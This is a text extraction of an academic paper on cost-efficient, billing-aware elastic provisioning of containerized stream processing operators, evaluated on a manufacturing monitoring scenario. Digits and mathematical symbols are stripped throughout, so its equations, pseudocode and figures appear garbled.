cloud computing paradigm (armbrust et al., ), a more promising provisioning approach, namely elastic provisioning for stream processing systems, emerged in recent years (satzger et al., ; gedik et al., ; heinze et al., ; lohrmann, janacik & kao, ; xu, peng & gupta, ). this approach allows the spe to lease computational resources on-demand whenever they are required. resources can be released again as soon as they are not needed anymore. this approach allows for the cost-efficient enactment of stream processing topologies while maintaining high sla compliance (hochreiner et al., a). up to now, most elastic provisioning approaches only consider virtual machines (vms) as the smallest entity for leasing and releasing of computational resources. this approach is perfect applicable for private clouds, where the only objective of resource provisioning algorithms is resource-efficiency, and there is no need to consider any billing aspects or billing time units (btus). a btu defines the minimum leasing duration for computational resources, e.g., vms, and often amounts to h like on amazon ec (https://aws.amazon.com/ec /pricing/). the concept of the btu means that the user has to pay for each started hour, regardless of how many minutes the vm is used. because of the btu, the repeated leasing and releasing of vms may result in even higher cost than an over-provisioning scenario (genaud & gossa, ), because releasing a vm before the end of the btu results in a waste of resources. to address this shortcoming, this paper considers an additional resource abstraction layer on top of the vms, to allow for more fine-grained elastic provisioning strategies with the goal to ensure the most cost-efficient usage of the leased resources while respecting given slas. this additional layer is realized by applying the recent trend toward containerized software components, i.e., containerized stream processing operators. the containerization provides several advantages regarding deployment and management of computational resources. besides the smaller granularity compared to vms, containerized stream processing operators also allow for a faster adaption of the stream processing topology on already running computational resources. an additional layer of containers also enables reusing already paid computational resources, i.e., resources can be utilized for the full btu. today, frameworks like apache mesos (hindman et al., ), apache yarn (vavilapalli et al., ), kubenetes (https://kubernetes.io) or docker swarm (https://docs.docker.com/swarm/) provide the functionality to deploy containerized applications on computational resources. these frameworks rely on simple principles like random deployment, bin-packing, or equal distribution to deploy hochreiner et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://aws.amazon.com/ec /pricing/ https://kubernetes.io https://docs.docker.com/swarm/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ containers across multiple hosts. although these approaches work well for most use cases, the resource usage efficiency for the underlying vms in terms of their btus can be improved as we are going to show in our work. in this paper, we propose an elastic resource provisioning approach which ensures an sla-compliant enactment of stream processing topologies while maximizing the resource usage of computational resources and thus minimizing the operational cost, i.e., cost for computational resources and penalty cost for delayed processing, for the topology enactment. the results of our evaluation show that our approach achieves a cost reduction of about % compared to already existing approaches while maintaining the same level of quality of service. the main contributions of our work are the following: � we propose a btu-based resource provisioning approach, which only performs scaling activities when they are required to cope with the data volumes or when a downscaling operation can achieve a resource cost reduction while maintaining the same sla compliance level. � we extend the visp runtime (hochreiner et al., b) to support our btu-based resource provisioning approach. the visp runtime is designed to serve as a test environment for resource provisioning mechanism and for this work we have not only implemented the btu-based approach, but also refined the monitoring infrastructure to collect the information required for our approach. � we implement a real-world scenario from the manufacturing domain and evaluate the btu-based approach against a threshold-based baseline. the remainder of this paper is structured as follows: first, we provide a motivational scenario, discuss the system architecture and present the derived requirements in “motivation.” based on these requirements we then provide the problem definition for the optimization problem in “problem definition,” which leads to our optimization approach presented in “optimization approach.” in “evaluation,” we describe our evaluation setup and in “results and discussion,” we present the evaluation results and their discussion. “related work” provides an overview on the related work, before we conclude the paper in “conclusion.” motivation motivational scenario in the following paragraphs, we describe a data stream processing scenario from our eu h project cloud-based rapid elastic manufacturing (crema) (schulte et al., ). figure shows a stream processing topology, which is composed of nine different stream processing operator types (o –o ) that process the data originating from three different sources (s , s , s ). each of the operator types performs a dedicated operation to transform the raw data from manufacturing machines into value-added and human- readable information. the information from the data sources is used to monitor three different aspects, like the availability of the manufacturing machines or the machine temperature to avoid overheating of the machines and assess their overall equipment hochreiner et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ effectiveness (oee). in this scenario, we have two different types of data sources. the first type of data source are sensors, i.e., s and s , which emit machine-readable data and can be directly accessed via an api. the second type of data, e.g., s , is a video feed, which scans a display of the manufacturing machines because some information is not directly accessible via an api. this information needs additional preprocessing to transform the data into machine-readable data. the availability sensor (s ) emits the current status, i.e., available, defect or planned downtime, of the manufacturing machine every s. this information is then filtered by the filter availability (o ) operator, which generates warnings for each new downtime incident of a specific manufacturing machine. the warning is then forwarded to the inform user (o ) operator, which informs a human supervisor of the machines. the second data source is the production data (s ), which is obtained by a video stream, i.e., an image taken every s. this image contains different production-related information, such as the amount of produced goods and needs further processing, e.g., by optical character recognition (ocr), to extract machine-readable information. the parse and distribute data (o ) operator distributes the information to the three operators o , o , o that calculate the different components of the oee value. these individual components are then united by the calculate oee (o ) operator and afterwards forwarded to the generate report (o ) operator, which generates a pdf-report every minute. this report aggregates the information of all monitored machines and is forwarded once every minute to the inform user (o ) operator. the temperature sensor (s ) emits the temperature twice every second. this information is processed by the monitor temperature (o ) operator, which triggers a warning whenever the temperature exceeds a predefined threshold. this warning is then also forwarded to the inform user (o ) operator to inform the human supervisor. due to the different levels of complexity of the operations, each of these operator types has different computational resource requirements, e.g., cpu or memory. some of the operators, e.g., the parse and distribute data operator type, require more resources manufacturing machine manufacturing machine manufacturing machine calculate performance (o ) calculate availability (o ) calculate quality (o ) monitor temperature (o ) calculate oee (o ) filter availability (o ) generate report (o )inform user (o ) parse and distribute data (o ) availability sensor (s ) produc�on data (s ) temperature sensor (s ) figure stream processing topology from the manufacturing domain. full-size doi: . /peerj-cs. /fig- hochreiner et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ for processing one data item than others, like the filter availability. besides the computational requirements, each operator type is also assigned with specific service level objectives (slos), like the maximal processing duration of one single data item. these slos are monitored, and whenever one operator type threatens to violate the imposed sla, the system needs to provide more computational resources for data processing. system architecture to enact the stream processing topology from the motivational scenario, it is required to instantiate it on an spe. for our work at hand, we are extending the visp ecosystem, which was introduced in our previous work (hochreiner et al., b). visp represents an spe, which is capable of provisioning computational resources on demand to adapt to the incoming load from data sources. visp is composed of different components to cover the whole lifecycle of the stream processing topology enactment. figure shows a subset of these components, which are relevant for enacting the topology. for a detailed description of the components, please refer to our previous work (hochreiner et al., b) or to the online documentation of the visp ecosystem (https://visp-streaming. github.io), which is available under the apache . license. the primary task of the spe, i.e., visp runtime, is to process data originating from data sources (on the left side of the figure) to obtain value-added data for users (on the right side of the figure) based on the topology definition. the actual data processing is conducted by operators, which are deployed on computational resources, e.g., vms, provided by an infrastructure as a service environment. each operator type is instantiated from dedicated operator images hosted on an external operator repository. to instantiate a specific operator instance on any host for the first time, the operator image needs to be downloaded from the registry, which takes a certain amount of time, depending on the size of the operator image. after the first instantiation of the operator visp run�me topology definition computa�onal resources virtual machine operator operator n virtual machine n operator x operator z messaging infrastructure resource optimization resource provisioning resource monitor data source n data source r r operator image n operator image operator repository shared state figure visp stream architecture. full-size doi: . /peerj-cs. /fig- hochreiner et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://visp-streaming.github.io https://visp-streaming.github.io http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ type, the operator image is cached locally on the host to speed up the instantiation of future instances. each operator type is also assigned with individual slas whereas each sla consists of different slos. the first slo is the maximum processing duration for one data item and ensures the near real-time processing capabilities of the stream processing topology. the second slo describes the minimal resource requirements that are needed to instantiate the stream processing operator. these requirements are represented by the minimum amount of memory, i.e., memory in megabyte (mb), and the number of cpu shares. for the enactment of a stream processing topology, each operator from the topology is represented by at least one, but up to arbitrarily many operators. these operators fetch the data from the messaging infrastructure according to the topology definition, process it and push it back for further processing steps. the remaining components of the visp runtime are in charge of monitoring the load on the messaging infrastructure as well as on the operators. this monitoring information is then used by the resource optimization component to evaluate whether operator types need to be replicated to deal with the incoming load. finally, the resource provisioning component is in charge of deploying and un-deploying operators on computational resources. enactment scenario during the enactment, the stream processing operators need to deal with streaming data from a varying amount of manufacturing machines, as shown in fig. at the bottom. this varying data volume requires the spe to adapt its processing capabilities, i.e., the number of operator instances for specific operator types, which are hosted on an arbitrary amount of hosts, e.g., h –h in fig. , on demand to comply with the slas. nevertheless, the spe aims at minimizing the needed number of hosts, since each host amounts for additional cost, by using an optimal deployment. the enactment of our motivational scenario is partitioned into different stages, with a varying number of running manufacturing machines in each stage. at the beginning of stage , each operator is deployed once across the two hosts h –h . since the volume h stage arrival of streaming data over time a m ou nt o f m an uf ac tu ri ng m ac hi ne s o h o o o o o o o o stage h h o h o o o o o o o o o o o stage h h o h o o o o o h stage h h h o o o h o o o o o o o o o o o o o o o o o o o o o figure deployment stages. full-size doi: . /peerj-cs. /fig- hochreiner et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ of streaming data increases after some time, the spe needs to adapt the processing capabilities by deploying replicas of the operator types o , o and o in stage . these operator instances are hosted on a new host h because the two already existing hosts cannot cope with the additional operator instances. because the amount of data increases again in stage , the spe needs to replicate further operators to comply with the slas. although the second replication of the operator type o is feasible on the currently available resources, the spe is required to lease a new host for the additional operator instances of types o , o , o , and o . at the end of stage , h –h meet the end of their btu. therefore, the spe evaluates whether some of the replicated operators can be removed again without violating the slas. because the amount of data is decreasing after stage , the system can remove (o , o , o , and o ) or migrate (o ) some of the operator instances to other hosts. this leads to the situation that no operator instances are running on host h at the end of its btu and the spe can accordingly release h , while host h needs to be leased for another btu. requirements based on our motivational scenario, we have identified several requirements which need to be addressed by the optimization approach. sla compliance the first requirement is sla compliance in terms of maximum processing duration, for data that is processed by the stream processing topology. this compliance is the overall goal that needs to be met, regardless of the actual incoming data rate. cost efficiency the second requirement is the cost efficiency for the enactment. this requirement asks for a high system usage of leased resources and an efficient usage of cloud resources, especially regarding their btu. optimization efficiency the optimization efficiency requirement can be split into two different aspects. the first aspect is the solution of the optimization problem presented in “problem definition.” because this optimization problem is np-hard (see optimization problem), it is required to devise heuristics to achieve a time- and resource-efficient optimization approach. the second aspect is that the optimization needs to minimize the number of reconfigurations, e.g., scaling operations, for the stream processing topology because each reconfiguration activity has a negative performance impact on the data processing capabilities. problem definition system model and notation the system model is used to describe the system state of the individual operator types that form the stream processing topology as well as the used computational resources. the hochreiner et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ individual operator types are represented by o ¼ f ; . . . ; o#g, where o ∈ o represents a specific operator type. each operator type o is assigned with minimal resource requirements ocpu and omemory which need to be met to instantiate an operator on any host. at runtime, each operator type is represented by at least one, but up to arbitrary many operator instances, which are described by the set i ¼ f ; . . . ; i#g, whereas each itype is assigned to a particular operator type o ∈ o. this set of operator instances i is running on arbitrarily many hosts that are represented by the set h ¼ f ; . . . ; h#g, whereas each host hosts a subset of i. each of these hosts is furthermore assigned with a set of attributes. the attributes hcpu and hmemory represent the overall computational resources of the host, and the attributes hcpu� and hmemory� represent the remaining computational resources at runtime. the attributes hcpu� and hmemory� are decreased for every operator instance i on the specific host h and can be used to determine if it is possible to deploy an additional operator instance on this particular host h. the attribute hcost represents the cost for the host, which needs to be paid for each btu. the attribute hbtu� represents the remaining, already paid, btu time. to represent the different startup times between cached and non-cached operator images, each host furthermore denotes a set of images himg. this set contains all operator images o ∈ o, which are cached on this particular host. each operator type is assigned a specific image, whose identifier is identical to the name of the operator type. besides the fundamental operator type attributes for instantiating operators, there is also a set of attributes, which is used to ensure the sla compliance for data processing. each operator type is assigned with an estimated data processing duration oslo, that represents the time to process one data item and pass it on to the following operator type according to the stream processing topology. the oslo value is recorded in an optimal processing scenario, where no data item needs to be queued for data processing. since the slo oslo only presents the expected processing duration, we also denote the actual processing duration for each operator od and the amount of data items oqueue that are queued for a particular operator type for processing. in addition to the current od, the system model also considers previous processing durations. here we consider for each operator type o, the last n processing durations od denoted as od to odn, whereas each of the values gets updated after a new recording of the od, i.e., od obtains the value of od and od obtains the value of od , etc. if the actual processing duration od takes longer than the slo oslo, penalty cost p accrue to compensate for the violated slas each time a violation v ∈ v occurs. furthermore, we denote two operational attributes for each operator type. the attribute o# represents all current instances, i.e., the sum of all instances of the operator type o, and the attribute os represents all already executed scaling operations, both upscaling and downscaling, for a specific operator type. last, we also denote the current incoming amount of data items as dr. optimization problem based on the identified requirements in “requirements,” we can formulate an optimization problem as shown in eq. ( ). the goal of this optimization problem is hochreiner et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ to minimize the cost for the topology enactment while maintaining given slos. this equation is composed of four different terms, which are designed to cover the different requirements. the first term represents the cost for all currently leased hosts by multiplying the number of all currently leased hosts with the cost for a single host. the second and third term are designed to maximize the resource usage on all currently leased hosts regarding the cpu and memory. the last term ensures the sla compliance of the deployment, due to the penalty cost, which accrue for each slo violation. although the solution of this optimization problem provides an optimal solution for a cost-efficient deployment, it is not feasible to rely on the solution of this problem due to its complexity. to define the complex nature of this problem, we are going to provide a reduction to an unbounded knapsack problem (andonov, poirriez & rajopadhye, ), which is known to be np-hard. min h# � hcost þ p h h hcpu � p i i\itype¼o ocpup h h hcpu þ p h h hmemory � p i i\itype¼o hmemoryp h h hmemory þ x v v v � p ( ) definition of knapsack problem the unbounded knapsack problem assumes a knapsack, whose weight capacity is bounded by a maximum capacity of c and a set of artifacts a. each of these artifacts a is assigned with a specific weight aw > as well as a specific value av > and can be placed an arbitrary amount of times in the knapsack. the goal is to find a set a of items, wherep a a aw � c and p a a av is maximized. np-hardness of the optimization problem for our reduction, we assume a specific instance of our optimization problem. for this specific instance, we assume that the number of hosts is fixed and that each of the operators has the same memory requirements omemory. furthermore, we define the value of a specific operator by the amount of data items oqueue that are queued for a specific operator type, i.e., the more items need to be processed, the higher is the value for instantiating a specific operator. based on this specific instance of the optimization problem, we can build an instance of the unbounded knapsack problem, where the maximum capacity c is defined by the maximum amount of cpu resources on all available hosts p h h hcpu, the weight aw of the artifacts a is defined by the cpu requirements ocpu of one operator and the value av of the artifact is defined by the number of items waiting on the operator type-specific queue oqueue. hochreiner et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ because a specific instance of our optimization problem can be formulated as a knapsack problem, we can conclude that our optimization problem is also np-hard. this concludes that there is no known solution which can obtain an optimal solution in polynomial time. since this conclusion conflicts with the third requirement given in “requirements,” we decided to realize a heuristic-based optimization approach, which can be solved in polynomial time. optimization approach the overall goal our optimization approach is to minimize the cost for computational resources and maximize the usage of already leased vms while maintaining the required qos levels. therefore, we apply an on-demand approach to reduce the deployment and configuration overhead, i.e., instantiating and removing additional operator instances, and minimize the computational resources required for finding an optimal deployment configuration. due to our emphasis on the btus of vms, we call our approach btu- based approach in the remainder of this paper. ensure sufficient processing capabilities to avoid penalty cost, our approach continuously evaluates the sla compliance of the stream processing topology. whenever the individual processing duration od of a particular operator type o exceeds or threatens to exceed the maximum allowed processing duration oslo according to the upscaling algorithm as shown in algorithm , the upscaling procedure for the specific operator type is triggered. this upscaling procedure consists of several steps, as depicted in fig. . the first task is to evaluate if any of the currently running hosts offers enough computational resources to host the additional instance of the specific operator. therefore, we apply the host selection algorithm, as described in algorithm , for every currently running host to obtain a utility value for the host. assuming that there is at least one host with a positive utility value, the host with the best utility value is selected to deploy the new operator instance, and the upscaling procedure is finished. when no host with a positive utility value is available, i.e., no hosts offers enough computational resources to instantiate a new instance for the required operator type, there are two possibilities to obtain the required computational resources. the first possibility is to scale down existing operators when they are not required anymore. we therefore apply the operator selection algorithm, as described in algorithm and discussed in “algorithms.” if there is any operator type that can be scaled down, an operator instance of this operator type will be scaled down to free resources for the upscaling operation. when there are no operator types which can be scaled down, i.e., all operators are needed for sla-compliant data stream processing, the second possibility is applied where the spe leases a new host. as soon as the resources are either provided by scaling down another operator type or the new host is running, the spe deploys the required operator instance and finishes the upscaling procedure. hochreiner et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ optimize resource usage to minimize the cost of computational resources, the optimization approach aims at using the leased resources as efficient as possible. this means that the spe uses all paid resources until the end of their btus and evaluates shortly before, i.e., within the last % of the btu, whether a host needs to be leased for another btu, i.e., the resources are still required, or if the host can be released again. to release hosts, as shown in fig. , all operator instances running on the designated host which is targeted to be shut down, need to be either released or migrated to other hosts. this releasing procedure consists of three phases. the first phase is a simulation phase, where the optimization approach creates a downscaling plan to evaluate whether the downscaling and migration is actually feasible. hereby, the optimization approach applies the operator selection algorithm for all operator types, which have running instances on this host and obtain their utility value. if any of the operator types has a positive utility value, all operator instances (up to % of all operator instances for the specific type) running on this host are marked to be released. the %-threshold for the operator instances is in place to avoid any major reconfigurations for a single operator type, since it may be the case that all operator instances for the operator type are running on this host and after the downscaling there would be not sufficient operator instances left algorithm upscaling algorithm : function uptrigger(o,n) : if od > oslo then : upscaling = : end if : observationmean ¼ n � pni¼ i : durationmean ¼ n � pni¼ odi : � ¼ pn i¼ ði � observationmeanÞ � ðodi � durationmeanÞpn i¼ ði � observationmeanÞ : a = durationmean - b * observationmean : predictedduration = a + b * (n + ) : if predictedduration > oslo then : upscaling = : end if : if upscaling = then : return : end if : if oqueue > scalingthreshold then : return : end if : return : end function hochreiner et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ which would trigger again the upscaling procedure. for those operator instances which cannot be shut down, the procedure simulates whether they can be migrated to other hosts. this simulation uses the upscaling procedure for operator types, as described in “ensure sufficient processing capabilities.” the only difference is that the host which is targeted to be shut down, is omitted as a suitable host. if the simulation renders no feasible downscaling plan, the host is leased for another btu and the downscaling procedure is finished. in case there is a downscaling plan, the operators are released in phase two and if any migration is required, the upscaling procedure for operator types is triggered based on the simulation in phase three. when all operator instances are successfully removed (scaled down or migrated), the shutdown of the host is initialized. in the unlikely event that the downscaling plan could not be executed, i.e., the operator instance migrations fail, the host also needs to be leased for another btu. best host selected sufficient processing capabili�es for specific operator type add instance for specific operator type not enough resources available not enough resources available try scaledown for other operator types scaledown successful scaledown not successful enough resources availablelease another host add instance for specific operator type upscaling for a specific operator type triggered assess u�lity of hosts enough resources available select best host figure upscaling procedure for a specific operator type. full-size doi: . /peerj-cs. /fig- algorithm host selection algorithm : function up(h,o) : feasibilitythreshold = min((hcpu*/ocpu), (hmemory*/omemory)) : if feasibilitythreshold < then : return - : end if : remainingcpu = hcpu* - ocpu : remainingmemory = hmemory* - omemory : difference ¼j remainingcpu hcpu � remainingmemory hmemory j : suitability ¼ difference feasibilitythreshold : if s ∈ himg then : suitability = suitability * cf : end if : return suitability : end function hochreiner et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ algorithms to realize our btu-based provisioning approach, we have devised three algorithms, which are discussed in detail in this section. these three algorithms realize individual tasks for the upscaling and downscaling procedures as shown in figs. and . algorithm ensures the sla compliance of the individual operator types on a regular basis by interpreting the monitoring information of the visp runtime. the other two algorithms are only triggered if a new operator instance needs to be started or when there is a shortage of free computational resources. these two algorithms analyze the sla compliance and resource algorithm operator selection algorithm : function down(o) : if o# < then : return - : end if : instances ¼ o# � minðo# oÞ maxðo# oÞ � minðo# oÞ : delay ¼ od oslo � þ pð Þ : scalings ¼ osp os o os : if oqueue < then : queueload = ql : else : queueload = : end if : return + w * instances + w * queueload - w * delay - w * scalings : end function btu of host ends no running operator instances try scaledown of all operator instances scaledown successful scaledown not successful s�ll running operator instances try migra�on of all operator instances migra�on successful migra�on is not successful s�ll running operator instances host leased for another btu prolong leasing host released release host downscaling plan exists simulate operator downscaling and migra�on simula�on not successful simula�on succesful figure downscaling procedure for a host. full-size doi: . /peerj-cs. /fig- hochreiner et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ usage on demand at specific points in time and identify the most suitable host for upscaling (algorithm ) or potential operator types, which can be scaled down (algorithm ). although these algorithms do not represent the core functionality of the resource provisioning approach, they are still essential to identify required upscaling operations and choose the optimal degree of parallelism per operator whereas the overall cost-reduction and reconfiguration is represented by the downscaling procedure shown in fig. . the remainder of this section discusses the structure and rationale of these three algorithms in detail. the upscaling algorithm as listed in algorithm is used to evaluate whether any operator needs to be scaled up. this algorithm is executed on a regular basis for each operator type o and either returns , if the current stream processing capabilities are enough to comply with the slas, or if the operator type needs to be scaled up. therefore, this algorithm considers, on the one hand, the current processing duration of the operator (line ) and, on the other hand, the trend of the previous processing durations. for the trend prediction, we apply a simple linear regression for the last n observations, based on the linear least squares estimator (lines – ). if the current duration od or the predicted duration is higher than the slo oslo, we consider the operator type to be scaled up (line ). before we trigger the upscaling operation, we apply an additional check if the upscaling operation is required. the stream processing topology may retrieve short-term data volume peaks, e.g., due to short network disruptions. these peaks would not require any additional computational resources, because they would be dealt with after a short time with the already available processing capabilities. nevertheless, the upscaling algorithm would trigger the upscaling procedure, because it would detect the processing delay. therefore, the algorithm also considers the current load of data items oqueue before scaling up by checking whether the amount of queued items for processing exceeds a scalingthreshold (lines – ). algorithm , i.e., the host selection algorithm, is used to rank all currently leased hosts according to their suitability to host a new operator instance of a particular operator type. therefore, the algorithm evaluates for each host h whether a new instance of the required operator type o could be hosted on that specific host at all. here, the algorithm considers both, the cpu and memory requirements, and derives the maximum amount of instances that can be hosted. if this value is less than , i.e., there are no resources left for a single additional operator instance, the function returns a negative value. the first check evaluates the feasibility of deploying a new operator instance on the host (lines – ). in a second stage, this algorithm evaluates the suitability of this host. here the algorithm simulates the resource usage of the host, assuming the operator instance would be deployed on the host. the overall goal is an equal distribution of cpu and memory usage across all hosts, to avoid situations where hosts maximize their cpu usage, but hardly use any memory and vice versa. therefore, the algorithm calculates the difference between the normalized cpu usage and memory usage, whereas a lower value represents a better ratio between cpu and memory and therefore a better fit (lines – ). besides the equal distribution of memory and cpu on the individual hosts, we also want to distribute hochreiner et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the operators equally among all currently leased hosts. the assigned cpu ocpu and memory omemory attributes only represent the resources which are guaranteed for the operators. this allows operators to use currently unused resources of the hosts based on a first come first service principle. to maximize the usage, we aim for an equal distribution of the unassigned resources, i.e., hcpu� and hmemory�, which can be used by the operators to cover short-term data volume peaks without any reconfigurations required. this aspect is covered by dividing the difference value by the feasibility value to prefer those hosts which are least used (line ). last, we also consider the deployment time aspect for a particular operator type. here, we prefer those hosts, which have already the operator image cached. while such operator images may be rather small for spes which operate on a process or thread level, like apache storm, these images can reach up to mb for containerized operators. this requires some time to download the operator images from an external repository. in order to distinguish hosts, which have a cached copy of the operator image from those hosts that do not have a cached copy of the operator image, we multiply the suitability with a constant factor cf to create two different groups of hosts for the overall selection (lines – ). for this constant factor, we recommend to use the value . which was also used in the remainder of our work. the value . was chosen to clearly distinguish these two groups, since the actual suitability values are always in the range of – based on the structure of the algorithm. each of these group maintains their resource-based ordering, but we prioritize those hosts that provide a faster startup time due to the cached image, i.e., the group with lower values. the result of this algorithm is either a negative value for a host, i.e., the host can run the new operator instance, or a positive value, whereas the lowest value among several hosts shows the best suitability. algorithm , i.e., the operator selection algorithm, is used to select operator types which can be scaled down without violating the slos. therefore, this algorithm considers several static as well as runtime aspects of the operator types. the goal of the algorithm is to obtain a value which describes the suitability of a particular operator type to be scaled down. whenever the value is negative, the operator type must not be scaled down, i.e., all operator instances for this type are required to fulfill the slo. first, the algorithm ensures that there is at least one operator instance for the given operator type (lines – ). second, the function considers the amount of all currently running instances for the specific operator type and normalizes it to obtain a value between and (line ). this normalization is carried out based on the maximal respectively minimal amount of instances for all operator types. this value represents the aspect that it is better to scale down an operator type with numerous operator instances because the scale down operation removes a smaller percentage of processing power compared to an operator type with fewer operator instances. furthermore, we consider the sla compliance of the particular operator. here, we consider the actual compliance for the processing duration and multiply it with the penalty cost as a weighting factor (line ). since the penalty cost for the violation of a single data item is typically lower than , we add to the penalty cost p. whenever the processing duration od takes longer than the slo oslo, the delay value will be less than , hochreiner et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ but when there is any delay, the delay value can become arbitrarily high. the next value for consideration is the relative amount of scaling operations (both up and down) in contrast to the entire scaling operations (line ). here, we penalize previous scaling operations because we want to avoid any oscillating effects, i.e., multiple up- and down-scaling operations for a specific operator. the last factor is the queueload. in the course of our evaluations, we have seen that the algorithm may take a long time to recover after a load peak, i.e., release obsolete operator instances as soon as the data is processed. this can be observed when the spe is confronted with a massive data spike followed by a small data volume for some time. for this scenario, the heuristic discourages any downscaling operation due to the delay factor, which may be high due to the delayed processing of the data spike. to resolve this shortcoming, we introduce the queueload factor ql, which encourages the downscaling of an operator type, as soon as no data items are waiting in the incoming queue oqueue (lines – ). for ql we recommend the use of the value to clearly indicate that the operator type can be scaled down, regardless of the other values which are in the range of – for the instances and scalings value or significantly lower than for the delay value. this value was selected based on a number of preliminary experiments prior to the actual evaluation where the data processing never took longer than times of the intended processing duration. finally, we join the distinct aspects to obtain the overall utility value. while the number of instances and queueload represent a positive aspect to scale down an operator, all other aspects discourage a scaling operation. the instances and scalings value are normalized between and whereas the scalings value can exceed if the data processing is delayed. therefore, we introduce optional weights w , w , w , and w for the different aspects, whereas the default value for each of these weights is to treat all aspects with the same emphasis. the result is the utility value, which describes the suitability of the particular operator to be scaled down, whereas a higher value suggests a better suitability (line ). evaluation evaluation setup for our evaluation, we revisit our motivational scenario (see motivation) and discuss the concrete implementation of this topology. sensor types first, we are going to discuss the sensors which emit the data items for our topology. in this topology, we consider three different sensor types, as listed in table . each of these sensor types generates a data item, with a particular structure, which can be only processed by a dedicated operator type, e.g., o for sensor type s . due to the different structure, the size of the data items also differs. the first and the last sensor type (s and s ) encode the information in plain text. this results in rather small data items with a size of – bytes. the second sensor type encodes the information with an image and is therefore much larger, i.e., around , bytes. hochreiner et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ operator types the second important implementation aspect for the topology are the operators. each of these operator types performs a specific task with specific resource requirements and specific processing durations. table lists all operator types which are used in this evaluation. each operator is assigned a number of different performance as well as resource metrics. the resource metrics represent mean values across several topology enactments. the processing duration represents the average times which are required to process one specific data item as well as the time the data item is processed within the messaging infrastructure between the previous operator and the one in focus. the cpu metric represents the amounts of shares which are required by the operator when executed on a single core vm. the memory value represents the mean memory usage. this memory value accumulates the actual used memory by the operator instances and the currently used file cache, which results in a rather high value compared to the actual size of the operator image. the cpu metric and the memory metric are determined based on long-term recordings, whereas the stated value in the table is calculated by adding both the absolute maximum and the average value of all observations for a specific operator and dividing this value by . for the processing duration, we have conducted several preliminary evaluations, where the spe is processing constant data volumes in a fixed over-provisioning scenario to avoid any waiting durations for the recordings. for the storage operator, we have three different sizes. because the majority of the processing operators only implement processing logic, the size of the images is the same. the only two exceptions are the generate report (o ) image, which also contains a pdf table sensor types. emission rate/min size (bytes) availability sensor (s ) production data (s ) , temperature sensor (s ) table stream processing operator types. processing duration (ms) cpu shares memory (mb) storage (mb) state outgoing ratio parse and distribute data (o ) , ✓ : filter availability (o ) ✓ : calculate performance (o ) ✓ : calculate availability (o ) ✓ : calculate quality (o ) ✓ : monitor temperature (o ) ✓ : calculate oee (o ) ✓ : inform user (o ) ✓ : generate report (o ) , ✓ : hochreiner et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ generation library and the parse and distribute data (o ) operator image, which also contains the tesseract binary, which is required to parse the images. each of the stateful operators, as indicated in the table, can store and retrieve data from the shared state to synchronize the data among different data items and different instances of one operator type. the outgoing ratio describes whether a particular operator type consumes more data items than it emits, e.g., o combines three data items before it emits a combined one, or whether it emits more data items than it receives, e.g., o distributes the production information to three other operator types. for our scenario, we have implemented nine different operators (https://github.com/ visp-streaming/processingnodes) as spring boot (https://projects.spring.io/spring-boot/) applications, which are discussed in detail in the remainder of this section. parse and distribute data (o ) the parse and distribute data operator type is designed to receive an image with encoded production data and parse this image to extract the information. for our implementation, we use the tesseract ocr engine (https://github.com/tesseract-ocr/ tesseract) to parse the image and then the spring boot application forwards the machine- readable production data to the downstream operator types. filter availability (o ) each manufacturing machine can have three different availability types: available, planned downtime, and defect. while the first two types represent intended behavior, the last type signals a defect and should be propagated to a human operator. this operator issues a warning for each new defect notification and filters all other data items. calculate performance (o ) the calculate performance operator type calculates the performance of the last reporting cycle, i.e., the time between two production data emissions. the actual performance is derived by the formula shown in eq. ( ) (nakajima, ). performance ¼ produceditems � idealproductiontime reportingcycle ( ) calculate availability (o ) the calculate availability operator type represents the overall availability of the manufacturing machine from the beginning of the production cycle, e.g., the start of the evaluation. the availability is defined by the formula shown in eq. ( ) (nakajima, ). availability ¼ totaltime � scheduleddowntime � unscheduleddowntime totaltime ( ) calculate quality (o ) the calculate quality operator type represents the ratio between all produced goods against defect goods from the beginning of the production cycle. the quality is defined by the formula shown in eq. ( ) (nakajima, ). hochreiner et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/visp-streaming/processingnodes https://github.com/visp-streaming/processingnodes https://projects.spring.io/spring-boot/ https://github.com/tesseract-ocr/tesseract https://github.com/tesseract-ocr/tesseract http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ quality ¼ totalproducedgoods � totaldefectivegoods totalproducedgoods ( ) monitor temperature (o ) the monitor temperature operator type filters all temperatures below a predefined threshold and issues a notification to the human operator for each new temperature violation. calculate oee (o ) the calculate oee operator synchronizes the upstream operations based on the timestamp of the initial data item and calculates the overall oee value according to the 